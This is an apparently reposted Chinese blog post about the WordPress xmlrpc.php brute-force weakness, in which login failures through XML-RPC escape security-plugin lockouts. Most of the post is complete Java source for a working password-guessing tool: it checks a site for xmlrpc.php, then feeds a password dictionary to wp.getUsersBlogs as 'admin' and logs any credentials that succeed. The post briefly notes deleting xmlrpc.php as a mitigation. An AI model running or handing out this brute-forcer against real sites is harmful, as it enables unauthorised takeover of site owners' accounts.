标签:style blog http color java 使用 os strong
wordpress是很流行的开源博客,它提供远程发布文章的方法,就是使用跟路径的xmlrpc.php这个文件,最近爆出xmlrpc漏洞,漏洞原理是通过xmlrpc进行认证,即使认证失败,也不会被Wordpress安装的安全插件记录,所以不会触发密码输错N次被锁定的情况。因此就可能被暴力破解,如果密码又是弱口令的话,就相当危险了。最简单的解决办法,就是删除xmlrpc.php这个文件。闲来无事,用java写了暴力破解的脚本,其实就是拿着各种用户名、密码去不断调用xmlrpc.phpp这个文件,检测认证结果,很简单。只为娱乐,暴力破解的事情,大家慎重。
Xmlrpc.java源码如下:
package com.yeetrack.security.wordpress; import org.apache.http.client.ClientProtocolException; import org.apache.http.client.config.RequestConfig; import org.apache.http.client.methods.CloseableHttpResponse; import org.apache.http.client.methods.HttpGet; import org.apache.http.client.methods.HttpPost; import org.apache.http.entity.StringEntity; import org.apache.http.impl.client.CloseableHttpClient; import org.apache.http.impl.client.HttpClients; import org.apache.http.util.EntityUtils; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.testng.annotations.Test; import java.io.*; /** * Created by victor wang on 2014/8/2. * 利用wordpress xmlrpc漏洞,暴力破解密码 */ public class Xmlrpc { private String userAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0"; RequestConfig requestConfig = RequestConfig.custom().setConnectionRequestTimeout(4000).setConnectTimeout(4000) .setSocketTimeout(4000).build(); private static Logger logger = LoggerFactory.getLogger(Xmlrpc.class); private CloseableHttpClient httpClient = HttpClients.custom() .setUserAgent(userAgent) .setDefaultRequestConfig(requestConfig) .build(); /** * 校验域名是否存在xmlrpc.php这个文件 */ private boolean checkXmlRpcFile(String domain) { domain = wrapperUrl(domain); if(domain==null) return false; HttpGet get = new HttpGet("http://"+domain+"/xmlrpc.php"); get.addHeader("User-Agent", userAgent); CloseableHttpResponse response = null; String resultString = null; try { response = httpClient.execute(get); if(null == response || response.equals("")) return false; resultString = EntityUtils.toString(response.getEntity()); } catch (IOException e) { e.printStackTrace(); } return resultString.contains("XML-RPC server accepts POST requests only."); } /** * 暴力尝试 */ private boolean forceLogin(String username, String password, String url) { //尝试登录 HttpPost post = new HttpPost("http://"+wrapperUrl(url)+"/xmlrpc.php"); post.addHeader("User-Agent", userAgent); String xmlString = "<?xml version=\"1.0\" encoding=\"iso-8859-1\"?><methodCall> <methodName>wp.getUsersBlogs</methodName> <params> <param><value>"+username+"</value></param> <param><value>"+password+"</value></param> </params></methodCall>"; StringEntity entity = null; try { entity = new StringEntity(xmlString); post.setEntity(entity); CloseableHttpResponse response = httpClient.execute(post); String loginResult = EntityUtils.toString(response.getEntity()); if(null== loginResult || loginResult.equals("")) return false; if(loginResult.contains("isAdmin")) { logger.info(url + "登录成功,userename--->" + username + " password--->" + password); return true; } } catch (UnsupportedEncodingException e) { e.printStackTrace(); } catch (ClientProtocolException e) { e.printStackTrace(); } catch (IOException e) { e.printStackTrace(); } return false; } /** * 净化url,去掉http://或者末尾的path */ private String wrapperUrl(String url) { if(null == url || url.equals("")) return null; if(url.startsWith("http://")) url = url.substring(7); if(url.contains("/")) url = url.substring(0, url.indexOf("/")); return url; } /** * 破解 */ @Test public void test() { String url = "http://somewordpress.com/xmlrpc.php"; if(!checkXmlRpcFile(url)) { logger.info(url+"--->不存在xmlrpc漏洞"); return; } File file = new File("src/main/resources/1pass00.txt"); //密码字典,这个网上一堆一堆的,或者自己生成也可 try { FileReader fileReader = new FileReader(file); BufferedReader bufferedReader = new BufferedReader(fileReader); String line = null; int count = 1; while ((line = bufferedReader.readLine()) != null) { System.out.println("" + count + " " + line); if(forceLogin("admin", line, url)) break; count++; //Thread.sleep(500); } } catch (Exception e) { e.printStackTrace(); } } }
项目使用maven管理,使用了apache的httpclient和log4j,pom.xml代码如下:
<?xml version="1.0" encoding="UTF-8"?> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"> <modelVersion>4.0.0</modelVersion> <groupId>com.yeetrack.security</groupId> <artifactId>wordpress-xmlrpc</artifactId> <version>1.0-SNAPSHOT</version>
Wordpress xmlrpc.php暴力破解漏洞,布布扣,bubuko.com
标签:style blog http color java 使用 os strong
原文地址:http://my.oschina.net/u/147181/blog/297411